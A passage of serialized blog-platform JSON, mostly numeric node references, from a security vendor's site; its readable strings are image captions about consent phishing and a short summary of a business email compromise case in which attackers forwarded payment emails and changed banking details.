46729],{"nodeType":178,"data":346453,"content":346454},{},[346455],{"nodeType":173,"value":317265,"marks":346456,"data":346457},[],{},{"nodeType":312,"data":346459,"content":346462},{"target":346460},{"sys":346461},{"id":317272,"type":317,"linkType":318},[],{"nodeType":178,"data":346464,"content":346465},{},[346466],{"nodeType":173,"value":317278,"marks":346467,"data":346468},[],{},{"nodeType":3769,"data":346470,"content":346471},{},[346472],{"nodeType":178,"data":346473,"content":346474},{},[346475,346478,346482],{"nodeType":173,"value":317288,"marks":346476,"data":346477},[],{},{"nodeType":173,"value":317292,"marks":346479,"data":346481},[346480],{"type":370},{},{"nodeType":173,"value":317297,"marks":346483,"data":346484},[],{},{"nodeType":178,"data":346486,"content":346487},{},[346488,346491,346498,346501,346505],{"nodeType":173,"value":317304,"marks":346489,"data":346490},[],{},{"nodeType":186,"data":346492,"content":346493},{"uri":317309},[346494],{"nodeType":173,"value":22819,"marks":346495,"data":346497},[346496],{"type":194},{},{"nodeType":173,"value":317316,"marks":346499,"data":346500},[],{},{"nodeType":173,"value":317320,"marks":346502,"data":346504},[346503],{"type":1646},{},{"nodeType":173,"value":317325,"marks":346506,"data":346507},[],{},{"nodeType":178,"data":346509,"content":346510},{},[346511],{"nodeType":173,"value":317332,"marks":346512,"data":346513},[],{},{"nodeType":250,"data":346515,"content":346516},{},[346517,346535,346553,346571],{"nodeType":254,"data":346518,"content":346519},{},[346520],{"nodeType":178,"data":346521,"content":346522},{},[346523,346526,346532],{"nodeType":173,"value":37,"marks":346524,"data":346525},[],{},{"nodeType":186,"data":346527,"content":346528},{"uri":317349},[346529],{"nodeType":173,"value":317352,"marks":346530,"data":346531},[],{},{"nodeType":173,"value":37,"marks":346533,"data":346534},[],{},{"nodeType":254,"data":346536,"content":346537},{},[346538],{"nodeType":178,"data":346539,"content":346540},{},[346541,346544,346550],{"nodeType":173,"value":37,"marks":346542,"data":346543},[],{},{"nodeType":186,"data":346545,"content":346546},{"uri":317369},[346547],{"nodeType":173,"value":317372,"marks":346548,"data":346549},[],{},{"nodeType":173,"value":37,"marks":346551,"data":346552},[],{},{"nodeType":254,"data":346554,"content":346555},{},[346556],{"nodeType":178,"data":346557,"content":346558},{},[346559,346562,346568],{"nodeType":173,"value":37,"marks":346560,"data":346561},[],{},{"nodeType":186,"data":346563,"content":346564},{"uri":317389},[346565],{"nodeType":173,"value":317392,"marks":346566,"data":346567},[],{},{"nodeType":173,"value":10557,"marks":346569,"data":346570},[],{},{"nodeType":254,"data":346572,"content":346573},{},[346574],{"nodeType":178,"data":346575,"content":346576},{},[346577,346580,346586],{"nodeType":173,"value":37,"marks":346578,"data":346579},[],{},{"nodeType":186,"data":346581,"content":346582},{"uri":317409},[346583],{"nodeType":173,"value":317412,"marks":346584,"data":346585},[],{},{"nodeType":173,"value":37,"marks":346587,"data":346588},[],{},{"nodeType":178,"data":346590,"content":346591},{},[346592,346595,346601],{"nodeType":173,"value":317422,"marks":346593,"data":346594},[],{},{"nodeType":186,"data":346596,"content":346597},{"uri":317427},[346598],{"nodeType":173,"value":317430,"marks":346599,"data":346600},[],{},{"nodeType":173,"value":317434,"marks":346602,"data":346603},[],{},{"nodeType":231,"data":346605,"content":346606},{},[],{"nodeType":169,"data":346608,"content":346609},{},[346610],{"nodeType":173,"value":317444,"marks":346611,"data":346612},[],{},{"nodeType":178,"data":346614,"content":346615},{},[346616,346619,346625],{"nodeType":173,"value":37,"marks":346617,"data":346618},[],{},{"nodeType":186,"data":346620,"content":346621},{"uri":317455},[346622],{"nodeType":173,"value":317458,"marks":346623,"data":346624},[],{},{"nodeType":173,"value":317462,"marks":346626,"data":346627},[],{},{"nodeType":178,"data":346629,"content":346630},{},[346631],{"nodeType":173,"value":317469,"marks":346632,"data":346633},[],{},{"nodeType":178,"data":346635,"content":346636},{},[346637],{"nodeType":173,"value":317476,"marks":346638,"data":346639},[],{},{"nodeType":231,"data":346641,"content":346642},{},[],{"nodeType":169,"data":346644,"content":346645},{},[346646],{"nodeType":173,"value":317486,"marks":346647,"data":346648},[],{},{"nodeType":178,"data":346650,"content":346651},{},[346652,346655,346661,346664,346672,346675,346683],{"nodeType":173,"value":317493,"marks":346653,"data":346654},[],{},{"nodeType":186,"data":346656,"content":346657},{"uri":317498},[346658],{"nodeType":173,"value":317501,"marks":346659,"data":346660},[],{},{"nodeType":173,"value":317505,"marks":346662,"data":346663},[],{},{"nodeType":1698,"data":346665,"content":346668},{"target":346666},{"sys":346667},{"id":317512,"type":317,"linkType":318},[346669],{"nodeType":173,"value":317515,"marks":346670,"data":346671},[],{},{"nodeType":173,"value":1464,"marks":346673,"data":346674},[],{},{"nodeType":1698,"data":346676,"content":346679},{"target":346677},{"sys":346678},{"id":317525,"type":317,"linkType":318},[346680],{"nodeType":173,"value":211147,"marks":346681,"data":346682},[],{},{"nodeType":173,"value":1477,"marks":346684,"data":346685},[],{},{"nodeType":178,"data":346687,"content":346688},{},[346689],{"nodeType":173,"value":317537,"marks":346690,"data":346691},[],{},{"nodeType":178,"data":346693,"content":346694},{},[346695,346698,346704],{"nodeType":173,"value":317544,"marks":346696,"data":346697},[],{},{"nodeType":186,"data":346699,"content":346700},{"uri":317498},[346701],{"nodeType":173,"value":139178,"marks":346702,"data":346703},[],{},{"nodeType":173,"value":1477,"marks":346705,"data":346706},[],{},{"nodeType":178,"data":346708,"content":346709},{},[346710],{"nodeType":173,"value":317560,"marks":346711,"data":346712},[],{},{"nodeType":231,"data":346714,"content":346715},{},[],{"nodeType":169,"data":346717,"content":346718},{},[346719],{"nodeType":173,"value":18605,"marks":346720,"data":346722},[346721],{"type":370},{},{"nodeType":178,"data":346724,"content":346725},{},[346726],{"nodeType":173,"value":69741,"marks":346727,"data":346728},[],{},{"nodeType":178,"data":346730,"content":346731},{},[346732,346735,346741],{"nodeType":173,"value":61741,"marks":346733,"data":346734},[],{},{"nodeType":186,"data":346736,"content":346737},{"uri":98320},[346738],{"nodeType":173,"value":1472,"marks":346739,"data":346740},[],{},{"nodeType":173,"value":1477,"marks":346742,"data":346743},[],{},[317597,317598,317599,317600,317601,317602],{"items":346746},[346747,346749],{"sys":346748,"name":505},{"id":504},{"sys":346750,"name":509},{"id":508},{"items":346752},[346753],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":346754},{"url":19129},{"__typename":1528,"sys":346756,"content":346757,"title":288168,"synopsis":318418,"hashTags":118,"publishedDate":318419,"slug":288169,"tagsCollection":347161,"authorsCollection":347167},{"id":274110},{"json":346758},{"data":346759,"content":346760,"nodeType":165},{},[346761,346768,346775,346793,346800,346818,346824,346829,346835,346841,346847,346853,346859,346865,346871,346877,346883,346888,346894,346900,346906,346912,346928,346933,346939,346944,346950,346955,346961,346967,346973,347012,347018,347034,347040,347122,347138,347144,347150,347155],{"data":346762,"content":346763,"nodeType":178},{},[346764],{"data":346765,"marks":346766,"value":317965,"nodeType":173},{},[346767],{"type":1646},{"data":346769,"content":346770,"nodeType":178},{},[346771],{"data":346772,"marks":346773,"value":317973,"nodeType":173},{},[346774],{"type":1646},{"data":346776,"content":346777,"nodeType":178},{},[346778,346781,346790],{"data":346779,"marks":346780,"value":317980,"nodeType":173},{},[],{"data":346782,"content":346785,"nodeType":1698},{"target":346783},{"sys":346784},{"id":317985,"type":317,"linkType":318},[346786],{"data":346787,"marks":346788,"value":317991,"nodeType":173},{},[346789],{"type":194},{"data":346791,"marks":346792,"value":317995,"nodeType":173},{},[],{"data":346794,"content":346795,"nodeType":178},{},[346796],{"data":346797,"marks":346798,"value":318003,"nodeType":173},{},[346799],{"type":1646},{"data":346801,"content":346802,"nodeType":178},{},[346803,346806,346815],{"data":346804,"marks":346805,"value":318010,"nodeType":173},{},[],{"data":346807,"content":346810,"nodeType":1698},{"target":346808},{"sys":346809},{"id":269414,"type":317,"linkType":318},[346811],{"data":346812,"marks":346813,"value":318020,"nodeType":173},{},[346814],{"type":194},{"data":346816,"marks":346817,"value":318024,"nodeType":173},{},[],{"data":346819,"content":346820,"nodeType":178},{},[346821],{"data":346822,"marks":346823,"value":318031,"nodeType":173},{},[],{"data":346825,"content":346828,"nodeType":312},{"target":346826},{"sys":346827},{"id":318036,"type":317,"linkType":318},[],{"data":346830,"content":346831,"nodeType":178},{},[346832],{"data":346833,"marks":346834,"value":318044,"nodeType":173},{},[],{"data":346836,"content":346837,"nodeType":235},{},[346838],{"data":346839,"marks":346840,"value":318051,"nodeType":173},{},[],{"data":346842,"content":346843,"nodeType":178},{},[346844],{"data":346845,"marks":346846,"value":318058,"nodeType":173},{},[],{"data":346848,"content":346849,"nodeType":178},{},[346850],{"data":346851,"marks":346852,"value":318065,"nodeType":173},{},[],{"data":346854,"content":346855,"nodeType":235},{},[346856],{"data":346857,"marks":346858,"value":318072,"nodeType":173},{},[],{"data":346860,"content":346861,"nodeType":178},{},[346862],{"data":346863,"marks":346864,"value":318079,"nodeType":173},{},[],{"data":346866,"content":346867,"nodeType":178},{},[346868],{"data":346869,"marks":346870,"value":318086,"nodeType":173},{},[],{"data":346872,"content":346873,"nodeType":178},{},[346874],{"data":346875,"marks":346876,"value":318093,"nodeType":173},{},[],{"data":346878,"content":346879,"nodeType":178},{},[346880],{"data":346881,"marks":346882,"value":318100,"nodeType":173},{},[],{"data":346884,"content":346887,"nodeType":312},{"target":346885},{"sys":346886},{"id":318105,"type":317,"linkType":318},[],{"data":346889,"content":346890,"nodeType":178},{},[346891],{"data":346892,"marks":346893,"value":318113,"nodeType":173},{},[],{"data":346895,"content":346896,"nodeType":235},{},[346897],{"data":346898,"marks":346899,"value":318120,"nodeType":173},{},[],{"data":346901,"content":346902,"nodeType":178},{},[346903],{"data":346904,"marks":346905,"value":318127,"nodeType":173},{},[],{"data":346907,"content":346908,"nodeType":178},{},[346909],{"data":346910,"marks":346911,"value":318134,"nodeType":173},{},[],{"data":346913,"content":346914,"nodeType":178},{},[346915,346918,346925],{"data":346916,"marks":346917,"value":318141,"nodeType":173},{},[],{"data":346919,"content":346920,"nodeType":186},{"uri":270424},[346921],{"data":346922,"marks":346923,"value":270427,"nodeType":173},{},[346924],{"type":194},{"data":346926,"marks":346927,"value":318152,"nodeType":173},{},[],{"data":346929,"content":346932,"nodeType":312},{"target":346930},{"sys":346931},{"id":318157,"type":317,"linkType":318},[],{"data":346934,"content":346935,"nodeType":178},{},[346936],{"data":346937,"marks":346938,"value":318165,"nodeType":173},{},[],{"data":346940,"content":346943,"nodeType":312},{"target":346941},{"sys":346942},{"id":318170,"type":317,"linkType":318},[],{"data":346945,"content":346946,"nodeType":178},{},[346947],{"data":346948,"marks":346949,"value":318178,"nodeType":173},{},[],{"data":346951,"content":346954,"nodeType":312},{"target":346952},{"sys":346953},{"id":318183,"type":317,"linkType":318},[],{"data":346956,"content":346957,"nodeType":235},{},[346958],{"data":346959,"marks":346960,"value":318191,"nodeType":173},{},[],{"data":346962,"content":346963,"nodeType":178},{},[346964],{"data":346965,"marks":346966,"value":318198,"nodeType":173},{},[],{"data":346968,"content":346969,"nodeType":178},{},[346970],{"data":346971,"marks":346972,"value":318205,"nodeType":173},{},[],{"data":346974,"content":346975,"nodeType":250},{},[346976,346985,346994,347003],{"data":346977,"content":346978,"nodeType":254},{},[346979],{"data":346980,"content":346981,"nodeType":178},{},[346982],{"data":346983,"marks":346984,"value":318218,"nodeType":173},{},[],{"data":346986,"content":346987,"nodeType":254},{},[346988],{"data":346989,"content":346990,"nodeType":178},{},[346991],{"data":346992,"marks":346993,"value":318228,"nodeType":173},{},[],{"data":346995,"content":346996,"nodeType":254},{},[346997],{"data":346998,"content":346999,"nodeType":178},{},[347000],{"data":347001,"marks":347002,"value":318238,"nodeType":173},{},[],{"data":347004,"content":347005,"nodeType":254},{},[347006],{"data":347007,"content":347008,"nodeType":178},{},[347009],{"data":347010,"marks":347011,"value":318248,"nodeType":173},{},[],{"data":347013,"content":347014,"nodeType":178},{},[347015],{"data":347016,"marks":347017,"value":318255,"nodeType":173},{},[],{"data":347019,"content":347020,"nodeType":178},{},[347021,347024,347031],{"data":347022,"marks":347023,"value":318262,"nodeType":173},{},[],{"data":347025,"content":347026,"nodeType":186},{"uri":318265},[347027],{"data":347028,"marks":347029,"value":318271,"nodeType":173},{},[347030],{"type":194},{"data":347032,"marks":347033,"value":318275,"nodeType":173},{},[],{"data":347035,"content":347036,"nodeType":178},{},[347037],{"data":347038,"marks":347039,"value":318282,"nodeType":173},{},[],{"data":347041,"content":347042,"nodeType":250},{},[347043,347052,347061,347070,347089,347104,347113],{"data":347044,"content":347045,"nodeType":254},{},[347046],{"data":347047,"content":347048,"nodeType":178},{},[347049],{"data":347050,"marks":347051,"value":318295,"nodeType":173},{},[],{"data":347053,"content":347054,"nodeType":254},{},[347055],{"data":347056,"content":347057,"nodeType":178},{},[347058],{"data":347059,"marks":347060,"value":318305,"nodeType":173},{},[],{"data":347062,"content":347063,"nodeType":254},{},[347064],{"data":347065,"content":347066,"nodeType":178},{},[347067],{"data":347068,"marks":347069,"value":318315,"nodeType":173},{},[],{"data":347071,"content":347072,"nodeType":254},{},[347073],{"data":347074,"content":347075,"nodeType":178},{},[347076,347079,347086],{"data":347077,"marks":347078,"value":37,"nodeType":173},{},[],{"data":347080,"content":347081,"nodeType":186},{"uri":318327},[347082],{"data":347083,"marks":347084,"value":318333,"nodeType":173},{},[347085],{"type":194},{"data":347087,"marks":347088,"value":37,"nodeType":173},{},[],{"data":347090,"content":347091,"nodeType":254},{},[347092],{"data":347093,"content":347094,"nodeType":250},{},[347095],{"data":347096,"content":347097,"nodeType":254},{},[347098],{"data":347099,"content":347100,"nodeType":178},{},[347101],{"data":347102,"marks":347103,"value":318352,"nodeType":173},{},[],{"data":347105,"content":347106,"nodeType":254},{},[347107],{"data":347108,"content":347109,"nodeType":178},{},[347110],{"data":347111,"marks":347112,"value":318362,"nodeType":173},{},[],{"data":347114,"content":347115,"nodeType":254},{},[347116],{"data":347117,"content":347118,"nodeType":178},{},[347119],{"data":347120,"marks":347121,"value":318372,"nodeType":173},{},[],{"data":347123,"content":347124,"nodeType":178},{},[347125,347128,347135],{"data":347126,"marks":347127,"value":318379,"nodeType":173},{},[],{"data":347129,"content":347130,"nodeType":186},{"uri":318382},[347131],{"data":347132,"marks":347133,"value":318388,"nodeType":173},{},[347134],{"type":194},{"data":347136,"marks":347137,"value":318392,"nodeType":173},{},[],{"data":347139,"content":347140,"nodeType":235},{},[347141],{"data":347142,"marks":347143,"value":40632,"nodeType":173},{},[],{"data":347145,"content":347146,"nodeType":178},{},[347147],{"data":347148,"marks":347149,"value":318405,"nodeType":173},{},[],{"data":347151,"content":347154,"nodeType":312},{"target":347152},{"sys":347153},{"id":318410,"type":317,"linkType":318},[],{"data":347156,"content":347157,"nodeType":178},{},[347158],{"data":347159,"marks":347160,"value":37,"nodeType":173},{},[],{"items":347162},[347163,347165],{"sys":347164,"name":509},{"id":508},{"sys":347166,"name":26137},{"id":26136},{"items":347168},[347169],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":347170},{"url":155985},{"items":347172},[347173],{"fullName":271629,"firstName":71176,"jobTitle":271630,"profilePicture":347174},{"url":271632},{"json":347176,"links":347324},{"nodeType":165,"data":347177,"content":347178},{},[347179,347185,347191,347196,347209,347214,347220,347226,347250,347255,347270,347285,347300],{"nodeType":178,"data":347180,"content":347181},{},[347182],{"nodeType":173,"value":271448,"marks":347183,"data":347184},[],{},{"nodeType":178,"data":347186,"content":347187},{},[347188],{"nodeType":173,"value":271455,"marks":347189,"data":347190},[],{},{"nodeType":312,"data":347192,"content":347195},{"target":347193},{"sys":347194},{"id":271462,"type":317,"linkType":318},[],{"nodeType":178,"data":347197,"content":347198},{},[347199,347202,347206],{"nodeType":173,"value":271468,"marks":347200,"data":347201},[],{},{"nodeType":173,"value":271472,"marks":347203,"data":347205},[347204],{"type":370},{},{"nodeType":173,"value":271477,"marks":347207,"data":347208},[],{},{"nodeType":312,"data":347210,"content":347213},{"target":347211},{"sys":347212},{"id":271484,"type":317,"linkType":318},[],{"nodeType":178,"data":347215,"content":347216},{},[347217],{"nodeType":173,"value":271490,"marks":347218,"data":347219},[],{},{"nodeType":178,"data":347221,"content":347222},{},[347223],{"nodeType":173,"value":271497,"marks":347224,"data":347225},[],{},{"nodeType":178,"data":347227,"content":347228},{},[347229,347232,347238,347241,347247],{"nodeType":173,"value":271504,"marks":347230,"data":347231},[],{},{"nodeType":186,"data":347233,"content":347234},{"uri":271509},[347235],{"nodeType":173,"value":211147,"marks":347236,"data":347237},[],{},{"nodeType":173,"value":933,"marks":347239,"data":347240},[],{},{"nodeType":186,"data":347242,"content":347243},{"uri":271519},[347244],{"nodeType":173,"value":211157,"marks":347245,"data":347246},[],{},{"nodeType":173,"value":1477,"marks":347248,"data":347249},[],{},{"nodeType":312,"data":347251,"content":347254},{"target":347252},{"sys":347253},{"id":271531,"type":317,"linkType":318},[],{"nodeType":178,"data":347256,"content":347257},{},[347258,347261,347267],{"nodeType":173,"value":271537,"marks":347259,"data":347260},[],{},{"nodeType":186,"data":347262,"content":347263},{"uri":271542},[347264],{"nodeType":173,"value":271545,"marks":347265,"data":347266},[],{},{"nodeType":173,"value":271549,"marks":347268,"data":347269},[],{},{"nodeType":178,"data":347271,"content":347272},{},[347273,347276,347282],{"nodeType":173,"value":271556,"marks":347274,"data":347275},[],{},{"nodeType":186,"data":347277,"content":347278},{"uri":271561},[347279],{"nodeType":173,"value":148689,"marks":347280,"data":347281},[],{},{"nodeType":173,"value":271567,"marks":347283,"data":347284},[],{},{"nodeType":178,"data":347286,"content":347287},{},[347288,347291,347297],{"nodeType":173,"value":271574,"marks":347289,"data":347290},[],{},{"nodeType":186,"data":347292,"content":347293},{"uri":271579},[347294],{"nodeType":173,"value":271582,"marks":347295,"data":347296},[],{},{"nodeType":173,"value":271586,"marks":347298,"data":347299},[],{},{"nodeType":178,"data":347301,"content":347302},{},[347303,347306,347312,347315,347321],{"nodeType":173,"value":271593,"marks":347304,"data":347305},[],{},{"nodeType":186,"data":347307,"content":347308},{"uri":117883},[347309],{"nodeType":173,"value":271600,"marks":347310,"data":347311},[],{},{"nodeType":173,"value":2936,"marks":347313,"data":347314},[],{},{"nodeType":186,"data":347316,"content":347317},{"uri":117869},[347318],{"nodeType":173,"value":117876,"marks":347319,"data":347320},[],{},{"nodeType":173,"value":271613,"marks":347322,"data":347323},[],{},{"entries":347325},{"hyperlink":347326,"inline":347327,"block":347328},[],[],[347329,347336,347339],{"sys":347330,"__typename":5345,"title":347331,"caption":347332,"layoutMode":112585,"file":347333},{"id":271462},"Consent Phishing Email","Example of an email used during a consent phishing attack.",{"url":347334,"width":333817,"height":347335},"https://images.ctfassets.net/y1cdw1ablpvd/05rahhhZnAnanNd3fqxpB/96cc84e81acb4276f339f09b51fd4be0/Screenshot_2021-06-30_at_15.23.19.png",913,{"sys":347337,"__typename":5345,"title":345627,"caption":345628,"layoutMode":112585,"file":347338},{"id":271484},{"url":345630,"width":330097,"height":132213},{"sys":347340,"__typename":5345,"title":347341,"caption":347342,"layoutMode":112585,"file":347343},{"id":271531},"Consent phishing scopes highlighted","Example scopes asked for during a consent phishing attack",{"url":347344,"width":330097,"height":330098},"https://images.ctfassets.net/y1cdw1ablpvd/7zsc1ku1QkB6vrMoTjHZG3/1408ab7e37967633242dd15824a76317/Scopes_v3_highlighted.png","content:blog:consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa.json","blog/consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa.json","blog/consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa",{"_path":347349,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":347350,"ogImage":118,"summary":347352,"title":336733,"subtitle":118,"metaTitle":347363,"synopsis":346304,"hashTags":347364,"publishedDate":346307,"slug":336734,"tagsCollection":347365,"relatedBlogPostsCollection":347371,"authorsCollection":347968,"content":347972,"_id":348095,"_type":5439,"_source":5440,"_file":348096,"_stem":348097,"_extension":5439},"/blog/case-study-business-email-compromise-bec-attack-nearly-cost-us-millions",{"id":317985,"publishedAt":347351},"2024-03-21T09:21:33.190Z",{"json":347353},{"data":347354,"content":347355,"nodeType":165},{},[347356],{"data":347357,"content":347358,"nodeType":178},{},[347359],{"data":347360,"marks":347361,"value":347362,"nodeType":173},{},[],"An interesting BEC example. After attackers gained access to a senior employee's email account they began their Business Email Compromise (BEC) attack. They created a mail rule that forwarded all payment emails to another address and then followed up with an email changing the banking details. This nearly resulted in millions lost.","Business Email Compromise (BEC) attack nearly cost millions",[317597,317598,317599,317600,346306],{"items":347366},[347367,347369],{"sys":347368,"name":505},{"id":504},{"sys":347370,"name":26133},{"id":26132},{"items":347372},[347373,347682],{"__typename":1528,"sys":347374,"content":347375,"title":317594,"synopsis":317595,"hashTags":347671,"publishedDate":317603,"slug":317604,"tagsCollection":347672,"authorsCollection":347678},{"id":289406},{"json":347376},{"nodeType":165,"data":347377,"content":347378},{},[347379,347385,347390,347396,347412,347435,347441,347516,347531,347534,347540,347555,347561,347567,347570,347576,347613,347619,347634,347640,347643,347650,347656],{"nodeType":178,"data":347380,"content":347381},{},[347382],{"nodeType":173,"value":317265,"marks":347383,"data":347384},[],{},{"nodeType":312,"data":347386,"content":347389},{"target":347387},{"sys":347388},{"id":317272,"type":317,"linkType":318},[],{"nodeType":178,"data":347391,"content":347392},{},[347393],{"nodeType":173,"value":317278,"marks":347394,"data":347395},[],{},{"nodeType":3769,"data":347397,"content":347398},{},[347399],{"nodeType":178,"data":347400,"content":347401},{},[347402,347405,347409],{"nodeType":173,"value":317288,"marks":347403,"data":347404},[],{},{"nodeType":173,"value":317292,"marks":347406,"data":347408},[347407],{"type":370},{},{"nodeType":173,"value":317297,"marks":347410,"data":347411},[],{},{"nodeType":178,"data":347413,"content":347414},{},[347415,347418,347425,347428,347432],{"nodeType":173,"value":317304,"marks":347416,"data":347417},[],{},{"nodeType":186,"data":347419,"content":347420},{"uri":317309},[347421],{"nodeType":173,"value":22819,"marks":347422,"data":347424},[347423],{"type":194},{},{"nodeType":173,"value":317316,"marks":347426,"data":347427},[],{},{"nodeType":173,"value":317320,"marks":347429,"data":347431},[347430],{"type":1646},{},{"nodeType":173,"value":317325,"marks":347433,"data":347434},[],{},{"nodeType":178,"data":347436,"content":347437},{},[347438],{"nodeType":173,"value":317332,"marks":347439,"data":347440},[],{},{"nodeType":250,"data":347442,"content":347443},{},[347444,347462,347480,347498],{"nodeType":254,"data":347445,"content":347446},{},[347447],{"nodeType":178,"data":347448,"content":347449},{},[347450,347453,347459],{"nodeType":173,"value":37,"marks":347451,"data":347452},[],{},{"nodeType":186,"data":347454,"content":347455},{"uri":317349},[347456],{"nodeType":173,"value":317352,"marks":347457,"data":347458},[],{},{"nodeType":173,"value":37,"marks":347460,"data":347461},[],{},{"nodeType":254,"data":347463,"content":347464},{},[347465],{"nodeType":178,"data":347466,"content":347467},{},[347468,347471,347477],{"nodeType":173,"value":37,"marks":347469,"data":347470},[],{},{"nodeType":186,"data":347472,"content":347473},{"uri":317369},[347474],{"nodeType":173,"value":317372,"marks":347475,"data":347476},[],{},{"nodeType":173,"value":37,"marks":347478,"data":347479},[],{},{"nodeType":254,"data":347481,"content":347482},{},[347483],{"nodeType":178,"data":347484,"content":347485},{},[347486,347489,347495],{"nodeType":173,"value":37,"marks":347487,"data":347488},[],{},{"nodeType":186,"data":347490,"content":347491},{"uri":317389},[347492],{"nodeType":173,"value":317392,"marks":347493,"data":347494},[],{},{"nodeType":173,"value":10557,"marks":347496,"data":347497},[],{},{"nodeType":254,"data":347499,"content":347500},{},[347501],{"nodeType":178,"data":347502,"content":347503},{},[347504,347507,347513],{"nodeType":173,"value":37,"marks":347505,"data":347506},[],{},{"nodeType":186,"data":347508,"content":347509},{"uri":317409},[347510],{"nodeType":173,"value":317412,"marks":347511,"data":347512},[],{},{"nodeType":173,"value":37,"marks":347514,"data":347515},[],{},{"nodeType":178,"data":347517,"content":347518},{},[347519,347522,347528],{"nodeType":173,"value":317422,"marks":347520,"data":347521},[],{},{"nodeType":186,"data":347523,"content":347524},{"uri":317427},[347525],{"nodeType":173,"value":317430,"marks":347526,"data":347527},[],{},{"nodeType":173,"value":317434,"marks":347529,"data":347530},[],{},{"nodeType":231,"data":347532,"content":347533},{},[],{"nodeType":169,"data":347535,"content":347536},{},[347537],{"nodeType":173,"value":317444,"marks":347538,"data":347539},[],{},{"nodeType":178,"data":347541,"content":347542},{},[347543,347546,347552],{"nodeType":173,"value":37,"marks":347544,"data":347545},[],{},{"nodeType":186,"data":347547,"content":347548},{"uri":317455},[347549],{"nodeType":173,"value":317458,"marks":347550,"data":347551},[],{},{"nodeType":173,"value":317462,"marks":347553,"data":347554},[],{},{"nodeType":178,"data":347556,"content":347557},{},[347558],{"nodeType":173,"value":317469,"marks":347559,"data":347560},[],{},{"nodeType":178,"data":347562,"content":347563},{},[347564],{"nodeType":173,"value":317476,"marks":347565,"data":347566},[],{},{"nodeType":231,"data":347568,"content":347569},{},[],{"nodeType":169,"data":347571,"content":347572},{},[347573],{"nodeType":173,"value":317486,"marks":347574,"data":347575},[],{},{"nodeType":178,"data":347577,"content":347578},{},[347579,347582,347588,347591,347599,347602,347610],{"nodeType":173,"value":317493,"marks":347580,"data":347581},[],{},{"nodeType":186,"data":347583,"content":347584},{"uri":317498},[347585],{"nodeType":173,"value":317501,"marks":347586,"data":347587},[],{},{"nodeType":173,"value":317505,"marks":347589,"data":347590},[],{},{"nodeType":1698,"data":347592,"content":347595},{"target":347593},{"sys":347594},{"id":317512,"type":317,"linkType":318},[347596],{"nodeType":173,"value":317515,"marks":347597,"data":347598},[],{},{"nodeType":173,"value":1464,"marks":347600,"data":347601},[],{},{"nodeType":1698,"data":347603,"content":347606},{"target":347604},{"sys":347605},{"id":317525,"type":317,"linkType":318},[347607],{"nodeType":173,"value":211147,"marks":347608,"data":347609},[],{},{"nodeType":173,"value":1477,"marks":347611,"data":347612},[],{},{"nodeType":178,"data":347614,"content":347615},{},[347616],{"nodeType":173,"value":317537,"marks":347617,"data":347618},[],{},{"nodeType":178,"data":347620,"content":347621},{},[347622,347625,347631],{"nodeType":173,"value":317544,"marks":347623,"data":347624},[],{},{"nodeType":186,"data":347626,"content":347627},{"uri":317498},[347628],{"nodeType":173,"value":139178,"marks":347629,"data":347630},[],{},{"nodeType":173,"value":1477,"marks":347632,"data":347633},[],{},{"nodeType":178,"data":347635,"content":347636},{},[347637],{"nodeType":173,"value":317560,"marks":347638,"data":347639},[],{},{"nodeType":231,"data":347641,"content":347642},{},[],{"nodeType":169,"data":347644,"content":347645},{},[347646],{"nodeType":173,"value":18605,"marks":347647,"data":347649},[347648],{"type":370},{},{"nodeType":178,"data":347651,"content":347652},{},[347653],{"nodeType":173,"value":69741,"marks":347654,"data":347655},[],{},{"nodeType":178,"data":347657,"content":347658},{},[347659,347662,347668],{"nodeType":173,"value":61741,"marks":347660,"data":347661},[],{},{"nodeType":186,"data":347663,"content":347664},{"uri":98320},[347665],{"nodeType":173,"value":1472,"marks":347666,"data":347667},[],{},{"nodeType":173,"value":1477,"marks":347669,"data":347670},[],{},[317597,317598,317599,317600,317601,317602],{"items":347673},[347674,347676],{"sys":347675,"name":505},{"id":504},{"sys":347677,"name":509},{"id":508},{"items":347679},[347680],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":347681},{"url":19129},{"__typename":1528,"sys":347683,"content":347684,"title":317937,"synopsis":317938,"hashTags":347957,"publishedDate":317940,"slug":317941,"tagsCollection":347958,"authorsCollection":347964},{"id":317617},{"json":347685},{"data":347686,"content":347687,"nodeType":165},{},[347688,347703,347709,347733,347746,347752,347758,347764,347771,347777,347793,347799,347815,347820,347827,347833,347849,347856,347872,347879,347885,347933,347940,347946,347951],{"data":347689,"content":347690,"nodeType":178},{},[347691,347694,347700],{"data":347692,"marks":347693,"value":317628,"nodeType":173},{},[],{"data":347695,"content":347696,"nodeType":186},{"uri":317631},[347697],{"data":347698,"marks":347699,"value":317636,"nodeType":173},{},[],{"data":347701,"marks":347702,"value":317640,"nodeType":173},{},[],{"data":347704,"content":347705,"nodeType":235},{},[347706],{"data":347707,"marks":347708,"value":317647,"nodeType":173},{},[],{"data":347710,"content":347711,"nodeType":178},{},[347712,347715,347719,347722,347730],{"data":347713,"marks":347714,"value":317654,"nodeType":173},{},[],{"data":347716,"marks":347717,"value":317659,"nodeType":173},{},[347718],{"type":370},{"data":347720,"marks":347721,"value":317663,"nodeType":173},{},[],{"data":347723,"content":347726,"nodeType":1698},{"target":347724},{"sys":347725},{"id":317512,"type":317,"linkType":318},[347727],{"data":347728,"marks":347729,"value":317672,"nodeType":173},{},[],{"data":347731,"marks":347732,"value":317676,"nodeType":173},{},[],{"data":347734,"content":347735,"nodeType":178},{},[347736,347739,347743],{"data":347737,"marks":347738,"value":317683,"nodeType":173},{},[],{"data":347740,"marks":347741,"value":317688,"nodeType":173},{},[347742],{"type":370},{"data":347744,"marks":347745,"value":317692,"nodeType":173},{},[],{"data":347747,"content":347748,"nodeType":235},{},[347749],{"data":347750,"marks":347751,"value":317699,"nodeType":173},{},[],{"data":347753,"content":347754,"nodeType":178},{},[347755],{"data":347756,"marks":347757,"value":317706,"nodeType":173},{},[],{"data":347759,"content":347760,"nodeType":178},{},[347761],{"data":347762,"marks":347763,"value":317713,"nodeType":173},{},[],{"data":347765,"content":347766,"nodeType":178},{},[347767],{"data":347768,"marks":347769,"value":317721,"nodeType":173},{},[347770],{"type":370},{"data":347772,"content":347773,"nodeType":178},{},[347774],{"data":347775,"marks":347776,"value":317728,"nodeType":173},{},[],{"data":347778,"content":347779,"nodeType":178},{},[347780,347783,347790],{"data":347781,"mar